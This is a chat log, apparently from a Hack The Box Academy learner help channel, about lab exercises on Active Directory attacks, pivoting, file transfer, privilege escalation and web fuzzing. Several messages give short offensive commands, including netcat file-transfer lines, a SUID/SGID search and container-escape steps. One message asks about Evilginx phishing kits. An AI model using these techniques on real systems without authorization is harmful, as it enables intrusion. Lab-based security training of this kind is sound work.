python-dev-is-python3
Question: so I am doing Active Directory Enumeration & Attacks and I am supposed to get the password policy from inlanefreight.local. You are given the outward-facing host IP and SSH credentials. I SSH into the host and search /etc/hosts to see if inlanefreight.local is there, and it is. I tried to ping its associated address and get host unreachable. I also wanted to confirm with nslookup inlanefreight.local to see if it could get resolved, and nothing showed. Why would the host be unreachable?
I'll save you some potential heartache. Netexec is the replacement for crackmap
Oh, ty
Module Injection Attacks, section Exploitation of PDF Generation Vulnerabilities. How do you properly enumerate the internal web application? The payloads in the section mostly show errors for me
Hey @fathom pendant, I have a question for you. I want to be a pentester in the future; on the platform, do you recommend doing all the general modules first?
@analog dock you can also give you meaning ^^
It's not random, it's because I see you guys helping a lot, so I concluded that you have more knowledge and probably better advice to give ^^
I'm rarely in here
Hmm, rare? I saw you a few times. So do you have a lot of knowledge? I mean, what would you suggest?
How do we display these edges on Bloodhound?
There's literally a Pentester path on Academy
So idk what else you want tbh
I know, I'm also doing it, but the thing is that in this path they also give you modules to do where you don't immediately have access, like Tier IV modules, so what is the point of going further by skipping modules you can't do?
SQLMap Essentials
Skills Assessment: please give me a hint, I have looked at the whole page and I can't find yet what form sends a request
--skip-ssl at the end should fix this
Look for a button that triggers an event
Have the network tab open the whole time too
Hey
Anything like crackmapexec but for Windows? I got a user and want to run creds across the whole AD subnet.
I meant wydm 😂, but that’s cool, just trying to finish the the cpts path myself
What academy module is this for?
Read and follow #welcome to access more of the server
AD Enumeration & Attacks skill assessment. Also asking for general purposes too
I mean PowerView is a good tool
But in general you want to use pivoting techniques where you can
My strategy for tools to use are grabbing them from the target boxes from the module
:]
Also netexec >> crackmapexec
Doesn't netexec have a Windows version?
You should be pivoting like marcielee said tho
Need something for Windows. PowerView requires scripting (will see this). Asking one other thing about approach: so I got creds with Kerberoasting. Now I want to check which machine the creds belong to. Is this the right approach? I don't know which machine will get unlocked by the creds.
Thanks. I don't know which machine (don't know IP or name of host) I can get access to using the creds, so I'm checking the full subnet
You need to use a pivoting tool, and you can do it from Linux with crackmapexec
You can do a ping sweep
A ping sweep gives a list of active hosts. The brute-forcing part is still the same. Let's try using netexec. Also, am I doing this right? (asking as per methodology)
Where are you getting brute-forcing from?
Why don’t you just do everything from your Linux machine?
Apparently the internal AD seems not to be accessible from the outer machine. nxc or any other Linux tool gives "Failed to create connection object for target 172.16.6.59, exiting..."
Yes, we said to use a pivoting tool to get access to that like 3 times
Why do you keep ignoring the pivoting part of my sentences 💀
Do you know how to pivot?
Not ignoring. Reading about pivoting rn.
Learning pivoting is a whole lesson itself
It’s recommended to do pivoting then the ad module
Going for it now. Thanks a lot brother
Hi, I recently subscribed to the Silver Plan where you get 200 cubes each month. Is it accumulative, or does it clear each month??? Thanks in advance.
its accumulative
@fathom pendant I already found the parameter, I don't understand why automated tools don't detect it
About to get started on my HTB journey. I understand it's a more hands-on approach, which I enjoy, but does anyone have any tips/best practices they've found when it comes to note taking, i.e. what I should make notes of as I proceed?
I used the command to disable AV in the Windows infiltrating exercise, but when I went to Settings it's still on
I solved the lab but I was wondering why that happened
Whatever style of notes works best for you. Everyone is different. Some like taking huge chunks from the material, others like rewording the material in a way they understand. I like doing a little walkthrough for each section capturing commands and output.
Bare minimum document every user/credential/hash/key you come across, you never know when another section in the same module will use the previous findings.
Def don't wanna deal with my handwriting for that. Do you just use a Word doc, or do ya have a note-taking app you'd recommend?
Most around here use Obsidian, but there's Notion, CherryTree, OneNote, Joplin, and more.
I've heard of Obsidian before, will give it a look. Thank you!
Thanks @old oasis
If you're doing the Pentester path, pivoting comes before AD
I'm having trouble with this question: Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___.
I currently filtered for powershell.file.script_text and ranged it between the dates of the initial breach. Then I searched for P*V within the text block
Any help would be great
Well your issue is trying to directly look for the broad tool name
Instead of identifying what the code does, and identifying what invoke/get/whatever command is used and correlating that to the tool
Without something to lessen the load then I'll manually be looking at 100s of logs.
Hey guys,
I just started the pentest path and I’m using a local machine with openvpn. Connection is successful but on the module, I’m not able to reach the IPs they are using. Any idea how I can fix this issue? For instance I’m told to run nmap 10.0.0.5 but the host is down when I try it locally
What module and section?
Well that's an example ip, so it won't be reachable
Threat Hunting & Threat Intelligence Fundamentals
Hunting for Stuxbox
Question 3
Oh😂. Thank you. I thought those ips were live
Only the targets spawned by "Click here to spawn target!" are live
Also the scope of internal IPs is 10.129.0.0/16 iirc
AKA they only start with 10.129.x.x
Did you try googling some of the log entries?
Thanks!
Just copy/paste into google
Rule no. 5: stay in English, you won't get an answer in French. @mortal mirage #welcome
Just in case they don't speak English
A silly little skid video
please don't promote your content here
French, ew
Voice mod as well, making it barely audible, even for French
Hoping for some guidance from those who have completed this section. In the Whitebox Attacks - Type juggling assessment, am I supposed to stick to the SHA256 magic hashes, and am I correct that the username has to include 'admin' in it, but it can't be at the beginning? I've been working on this for 3 days and I am not sure what else to try.
Please🙏
The hell is that link
Again?!
there was a link? can I click on it?
..and you got a thumbs down
Oh, it was just a YouTube link, that's lame. I thought it was a phish.
In the AD attack skill assessment 1, how are we supposed to transfer other tools from Linux to Windows? It only allowed Rubeus.exe and mimikatz.exe; other than that, no other outside exe is allowed, or it's getting filtered. I'm trying to upload ligolo-ng to the Windows machine. So far I have tried the upload method in the web shell as well as the Python server and impacket-smbserver. Apparently the server I have access to does not allow the HTTP protocol.
I even tried exe2hex, but somehow it also gets filtered by the AV.
No need for all of that
You should be able to transfer files using one of the methods you mentioned
Keep it simple, and build up from there
Also there's no AV in that module
BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.
Unable to complete transfer.
ERROR CODE: 0x80200013 - The server does not support the necessary HTTP protocol. Background Intelligent Transfer Service (BITS) requires that the server support the Range protocol header.
Never seen this before
Even the Python HTTP server is not working either.
You are trying to upload from your machine (Linux) to the target (Windows), right?
yes
I have a Windows reverse shell, if that matters
You try wget or curl.exe?
Hey guys, I'm stuck on file transferring
I started an FTP server on my local machine, but my command on the remote host doesn't work. Any ideas?
Is your FTP server hosted on your filesystem root?
No from user
Then why are you trying to specify /home/user? From the perspective of the FTP connection it's looking for /home/user/home/user... from your request
The other thing: not being able to connect to your server
But I'm assuming that 10.0.2.15 is your tun0 ip
Though usually I've seen those ips as 10.10.x.x.
No, it's my enp0s3 IP
Well that's why it can't connect
Okay, thank you, just need to find the right path now 🙂
The spawned target doesn't have a route to your enp0s3 IP
Use the tun0 ip to connect back to
:)
tun0 is usually the interface used by the VPN
Okay, but I don't really understand what you mean with the file path? Should I not write the whole pwd?
not working
Yes
Whenever you host a fileshare, the share starts from where you're sharing from
It would be kinda scary if you could arbitrarily grab any file from any arbitrary share point
I'd assume your command is wrong, but without providing anything to go off of ¯\_(ツ)_/¯
If your FTP is hosted in /home/user and you did something like ftp://ip/home/user, it will go to /home/user/home/user, which is not the right path
Oh okay, got it, thank you guys
You specify the relative filepath from where the share is hosted
So Downloads/upload_win.zip
On the receiving end running,
nc -l -p 1234 > out.file
will begin listening on port 1234.
On the sending end running,
nc -w 3 [destination] 1234 < out.file
Used this btw. It's blocking outer tools like ligolo-ng and not Rubeus. I think it has something to do with HTB.
Got it thank you for the information
@shut quest
there's no AV, so nothing is really blocked
If you can show us which cmd you're running,
it will be easier to debug it
unable to send image here
Doubtful. Why not try setting up a simple Python HTTP server on your machine and, assuming you have PowerShell on the remote end, using wget ip:port/file -o file
Worked. If I use wget http:// it doesn't work. Thanks a lot.
What's the deal with sqlmap "What's the contents of table flag5? (Case #5)"? It keeps giving what looks like parts of a flag. Have restarted several times.
Hello, I'm completely new to all of this and want to get into cyber security. Eager to learn anything and everything. I need guidance/a mentor.
DMs are open
You still on this?
You'll need to repeat it a few times to piece together the full flag
No, I took to the forums and saw several had to keep restarting the lab and eventually got it to work. I hope the exam is not that buggy lol
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Unless you're willing to pay me $1k/week I don't do mentoring 
And even then I'm underselling myself
Ways to transfer tools to the internal pwned machine when pivoting?
Check the File Transfers module
What the hell am I looking at
The sudden jump from finding a flag with the find command to this is crazy
I don't understand a thing this section told me (Linux Privilege Escalation > Special Permissions)
re-read it then
then re-read it
I've tried. What I understood is that some files can only be executed/read/modified/whatever by a certain group with permissions to do so, or to do it as another user with those permissions
But I feel like it's so briefly touched upon
That's pretty much it. What don't you understand?
Check the Linux Fundamentals Permission Management section
What the question is asking me, and I guess a breakdown of the commands they gave me
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
Did you visit any of the links on the page that you read?
Ask ChatGPT to break down the command
Like, I get most of this, but -6000 is what's throwing me off
-6000, it's an SGID
I did, but it's still not clicking for me
It allows you to run the binary as the group who owns it
As far as the questions, there are binaries with the setuid and setgid bit set, and it just wants you to find them with the find commands that locate them
ChatGPT will tell you exactly what each part of the command means
So if I'm part of the group with SGID 6000 I can run that binary?
Worth a shot honestly, didn't cross my mind
How does your HTB look like that?
How else is it meant to look
From one of the links
Unlike the setuid bit, the setgid bit has effect on both files and directories. In the first case, the file which has the setgid bit set, when executed, instead of running with the privileges of the group of the user who started it, runs with those of the group which owns the file: in other words, the group ID of the process will be the same of that of the file.
Unless it's dark theme and it syncs to system settings, and I've never known there was a light theme
Just re-read the page in the link
Goblin please my eyes
😅
In the Password Attacks hard lab I am trying to transfer a kdbx file from the Windows target machine to my attack machine
javascript: (
function () {
// the css we are going to inject
var css = 'html {-webkit-filter: invert(100%);' +
'-moz-filter: invert(100%);' +
'-o-filter: invert(100%);' +
'-ms-filter: invert(100%); }',
head = document.getElementsByTagName('head')[0],
style = document.createElement('style');
// a hack, so you can "invert back" clicking the bookmarklet again
if (!window.counter) { window.counter = 1;} else { window.counter ++;
if (window.counter % 2 == 0) { var css ='html {-webkit-filter: invert(0%); -moz-filter: invert(0%); -o-filter: invert(0%); -ms-filter: invert(0%); }'}
};
style.type = 'text/css';
if (style.styleSheet){
style.styleSheet.cssText = css;
} else {
style.appendChild(document.createTextNode(css));
}
//injecting the css to the head
head.appendChild(style);
}());
That should be a serious rule break
What's your question?
What, light mode?
ya lol
Because if so.. yeah... it burns
I hate light mode, but the creme color is really selling me
it hurts even with black glasses
Any hints for the Command Injections skill assessment (CBBH)?
My hint is to go over the module.
Finally yessssssssss 👍 Solved it
Did you ever solve this?
What module?
It's SUID + SGID
@spare path why are you filtering out 200 response code?
Use a different thing to filter out
ok will investigate thank you
As 200 response code will also be what the actual valid response will give
Perhaps size may be a better filter
ah
How are the exploit development modules in htb academy?
I don't think there are any
Yeah there's not really a maldev academy module
I'd recommend Maldev Academy
Have you tried a GET request instead?
I remember seeing a -X POST in your command
ah I have not yet
A GET request should've been the first method you tried
Trying this command will take a while to complete. Is this a sensible way to fuzz the GET? ||python3 api_fuzzer.py http://IP:PORT/admin/panel.php --timeout 5 -o||
are you literally using IP:PORT or did you replace those with the actual ip and port?
I did replace
So the last lead I was following is the parameter ||accessID||, which the page will spit out to you if you do a basic curl. I'm trying to figure out where to fuzz that param, or how.
sqsh isn't returning any output for basically any command
What is api fuzzer?
Did you try panel.php?accessID=
It's searching for valid endpoints
Wdym? Just use ffuf
I guess you need ;
I think I remember having issues with sqsh too and just used sqlcmd, worked great
I prefer mssqlclient
This is MSSQL, not MySQL
Yeah, I ended up using it
Sorry, my bad
I found the pass of the mssqlsvc user, but auth with it isn't working
Remember there are two ways of authentication
WOOOHOO I found it thanks folks!
everyone's advice was helpful in the end used most of it
I guessed so, but does this mean I have to RDP and go from there?
Nah, you can use -windows-auth
Idk if this is the right name of the option, but check the help
Mssqlclient is great
Can just type a command and it does it for you
Like enable xp_cmdshell
How does the Windows auth part work? I thought that the MSSQL server authenticates from the context of a logged-in user
Authenticate against the machine, instead of the domain
Like local-auth in nxc
But if, for example, the RDP port is closed, how are you still able to auth?
Has nothing to do with RDP
Rdp isn’t only for domains
What I understand is that it uses your already logged-in session to authenticate you against the SQL server
You know the difference between SAM and NTDS?
You don't need to post contents of the module
Yes
But this machine isn't domain-joined, right?
So local-auth authenticates against SAM
You can authenticate against services if they have their own username/password scheme, or you can authenticate against other things like Windows
I understand the concept; I want to know how it is done technically
You've spent all this time asking about it over and over instead of just reading the section again
Plus d0s3nt gave you the answer
The only way to know more is to open mssqlclient and read the code
Did you do the Footprinting module already?
hello
I was doing the Footprinting module, and in domain enumeration it is sending a request to Shodan to find more info. When I tried it there is access denied (403 Forbidden). I initialized my API key.
Hi
Then I was thinking maybe my credits are empty, so I created a new account and then tried; same error
There's another parameter you need to add to your command to change it from service authentication to Windows authentication. It's that simple.
??
Yeah, I know, but how come I don't have credits in Shodan when I created a new account?
403 doesn't necessarily mean no credits. It means the user you authenticated with doesn't have access to that resource. https://help.shodan.io/the-basics/credit-types-explained
I think the command is something like shodan info to see how many you have
I forget exactly, but use the help option to find out
So I've found the subdomain and I'm just kind of pulling a blank on what to do next with this info. When I try ||ffuf -w common.txt -u http://subdomain.fuzzing_domain.htb:PORT/FUZZ -e .php,.html,.txt,.bak,.js -v|| I just get a bunch of errors piling up
I've replaced the exact port and domains etc for spoiler purposes
Also, where can I ask for help with VM networking?
Ok, let me think on this
Capture a request with Burp and look at the Host header
Almost finished
Looking for a decent wifi hacking antenna on amazon and need some advice. Which one should I get?
So I've found the vhost, and now you're suggesting I look at the Host header using Burp Suite? I haven't had to use Burp in this module, not too familiar with it.
I used the incorrect terminology earlier
Don't bother with it rn if not familiar; I was just tryna give you a better look at the Host header
I see
I don't really recall using the vhost for anything in the earlier lessons in the module kind of stumped now with what to do with it lol
I did see that it accepts XML?
So perhaps I could craft an XML POST fuzz
They did go over vhosts
Yeah, I reread the vhost section but don't see how it would apply to my situation yet
Yeah, gobuster gave me the subdomain by fuzzing the vhost
My apologies if I'm a bit dense on this, still early in my learning process
Yeah, now add that subdomain to your /etc/hosts
Ah ok, I did attempt that but didn't notice any immediate results, will try again
Make sure you're adding to your hosts file correctly: ip sub.domain domain
Oh I see, I think I may have done it incorrectly.
should it be:
IP subdomain.domain domain
or
IP subdomain.domain
IP domain
on separate lines
All on one line
IP sub.domain
If it's a different IP, then that's a new line
got it
You can also add it like this for multiple domains: <IP> sub1.domain sub2.domain
Neat, and it's just a space to separate? I think I noticed tab was more ideal when separating the IP from the domain
doesn't matter, whatever looks prettier to you
Completed Web Fuzzing! Thank you so much for all the help I was close to giving up.
https://academy.hackthebox.com/module/280/section/3140
now to go back and note down how I got there
Is anyone good with Evilginx and how to create a phishlet?
Hey, in Attacking Thick Client Applications I'm at the x64 debugger part and I need to find the magic bytes from a type-of-map with protection set to RW, but inside that I don't seem to find the magic bytes MZ in the ASCII column
Did you set the breakpoint to only the exit breakpoint?
Yes
Did you start the program before or after only setting that
The map they want you to see is at exactly the same position, relatively
If you set it after loading the thing, then you need to restart it
I started the program only after I went to Options > Preferences and only marked the exit breakpoint
And in the result I only see one RW with map type, but when I check it by double-clicking I don't see the magic bytes in ASCII
Size should be 3000
Guys, my netcat is not grabbing the banner
All the time it's showing unknown IP portno, no route to host
Mm, I don't think I find it. I'm doing something wrong but no idea what is wrong
Are you running the exe from the programdata folder?
It helps to give your command syntax, what module and section you're on.
If there's no route to host; are you connected to the vpn
Nope, I wasn't, I was running it from Apps
Basic netcat syntax is
nc ip port
Run the one generated in programdata after all the other steps
Yes, I am connected, but in every scan nmap shows host is down. I guess it is because of the firewall, but I am unable to connect with nc: unknown IP, no route to host
Yeah, in order to get a new exe they say we have to run a monta.ps1 script in ProgramData. I double-clicked and ran that monta.ps1 script with PowerShell, but no new exe appears in that folder
@fathom pendant I got it, bro, it was all that Academy VPN. I downloaded it again and tried, then I got it
Hi, has anyone faced a 403 error while trying to log in to Splunkbase from the HTB Academy lab? I am getting "403 ERROR
The request could not be satisfied.
Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
Generated by cloudfront (CloudFront)
Request ID: uQYs5Yiu4F9gjvDk2NIn4294Exa2B91MuJoxWdxzVMOqiJvxhcjcCw==
" error
Thanks. I grabbed it from https://github.com/MHaggis/sysmon-splunk-app
I grabbed it from https://github.com/MHaggis/sysmon-splunk-app and it is working.
One day they'll have an image for it
Hope I don't have to use this achievement to look for that.
I am just waiting for the day
when it will be added to the CBBH path
Module: Linux Privilege Escalation
Section: Containers
Link to section: https://academy.hackthebox.com/module/51/section/1588
I'm working on the question at the end of the section. I managed to import the container, initiate the image, and even started the container. However, the following command doesn't work for me:
lxc exec privesc /bin/bash
Error: Command not found
Hi guys. When do you plan to put video lessons in the Academy? Just reading is more stressful to learn from
Anyone else think like me?
I thought maybe it had to do with the location of the bash binary, so I checked:
which bash
/usr/bin/bash
So I tried the following command, but it still didn't work:
lxc exec privesc /usr/bin/bash
I then finally tried this command and it worked, but I didn't get a fully interactive shell:
lxc exec privesc sh
Would appreciate some insight into this. Thanks.
Try any of these and see if it works:
lxc exec privesc -- /usr/bin/bash -i
or
lxc exec privesc -- /bin/bash -i
We can try forcing it to open the shell as interactive.
Maybe it will work?
Neither of these works, and I just figured out why. Inside the image, there's no bash binary located at either of those paths.
So it's Z shell?
The reason the command below worked is that there was a sh binary in one of the PATH folders.
lxc exec privesc sh
Wdym?
-- This signals the end of command options for lxc exec, and everything after this is passed to the container's shell.
I tried it somewhere, don't remember where, but it worked that time.
Yeah, I tried it in your commands.
I'm 100% sure it didn't work because the image in the exercise doesn't have a bash binary present in the image's filesystem.
Instead of bash, use sh:
lxc exec privesc -- /bin/sh
Or try this:
lxc exec privesc /bin/sh
Does it have any login?
Yeah, this works since that's the location of the sh binary in the image's fs.
So you got unblocked?
Unblocked??
Now you can interact with the shell?
Yeah.
Corporate lingo.
Yes, this is why.
Thanks for the confirmation.
Hello there! Attacking Common Services, Easy lab. So far I found the f**** credentials. I tried to connect to FTP and found nothing. When I try to connect to MySQL with: mysql -u f**** -p9******** -h 10.129.203.7 I get: ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it. Am I on the right path? Did I do something wrong?
Is it MySQL or MSSQL?
There is one flag for this; check and try that.
Not sure if that can get you through the SSL check.
That's weird. I never got that error for the module.
🔥
I'm doing the Attacking Thick Client App in Attacking Common Services. Any help, somebody?
Does anyone else get NetBIOS timeout errors when they run the spider_plus module from CrackMapExec?
Hey guys, I'm doing the Exploiting SSRF section in the Server-side Attacks module, and the exercise wants me to download this tool using Python 2.7. The problem is that this version of Python no longer exists on the machine, and I can't find it anywhere. Any suggestions on how to solve it?
BTW, if I use any other version of Python I get an error from the tool.
I didn't need to use Gopherus to solve the lab, just to say that you can do it without it or by using any alternative tools you like.
Okay, I'll see what I can do without Gopherus.
You can try to install Python 2:
Download the Python 2.7 source tarball from the official Python website.
Extract the tarball: tar -xzf Python-2.7.x.tgz
Follow the installation instructions in the README file or use the following commands (no guarantees):
cd Python-2.7.x
./configure
make
make install
Did you block the file from deleting the exe?
Took 2 days, darn, but finally finished that, mate. Thanks to everyone who dropped their pointers in here; it all helped tons.
Was that just the PowerShell part?
Attacking Thick Client, that section actually. People, 2 points: sometimes the initial .bat file isn't spawned in the /2 directory; it'll just be in the /temp directory.
The next thing I got a bit stuck on was the debugging section. I ran the restart service exe in the apps folder itself, but I needed to do some stuff mentioned in the module and run a new restart service inside a ProgramData folder.
No, I got stuck at the two places I mentioned above, which dragged me a bit.
I'm talking about Java reversing, the next section.
Oh, I haven't started that yet. Took a breather, will start it soon.
I did, lol.
I'm not fully awake this morning. Someone mind helping me better understand here on the Session Attacks module:
https://academy.hackthebox.com/module/153/section/1449
The site is vulnerable to CSRF and we manipulate the email param; we use it to make a callback to our nc listener, and the listener receives a GET request and turns over all the URL params (probably cookies, need to check the request). Why is it doing this, and not just doing a GET on the (somewhat invalid) resource itself?
I have no JavaScript to return cookies/params to the nc listener in the PoC.
Oh wait, it's the page source.
... Sorry, haven't had my coffee yet... it just came through looking funny.
Is the target IP correct?
I don't know why 4444 is there, but the rest is correct.
Well, your RHOST and LHOST are the same.
I'm guessing they're not meant to be.
Unless you want to EternalBlue yourself, no.
Do I need to remove the end part after the colon?
Put the IP only.
Remove the port number.
Also, don't bother with EternalBlue; it's not gonna be that.
Aren't those IPs a bit different from the other machines?
What module and section? Are you just trying random exploits?
I don't think you can get RCE on the 80-97 IP machines, tbh.
Getting Started, Public Exploits.
Simpler terms please 🙏
What makes you think that it's gonna be EternalBlue?
Go to the IP given in your browser and take a look.
Like, do you mean do an nmap?
Look at the question:
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
Okay, sorry to ask, but how do I identify the service running?
Look for version numbers and try to find an exploit.
The example isn't going to be the exact same.
You had a version number on the webpage.
Okay, so you're saying that there was a version number in the target I spawned?
And if so, how do I find such a thing?
Anyone know how they get the terminal output to show nicely like this in Obsidian? From the Reporting module.
That is not nice at all; the columns are not aligned.
It just looks like a code block.
Open Firefox and it's right in your face.
When I do a code block it looks like this,
for comparison.
It's some white text on a greyish background, but theirs looks much better.
It depends on your theme.
There's a Code Styler plugin.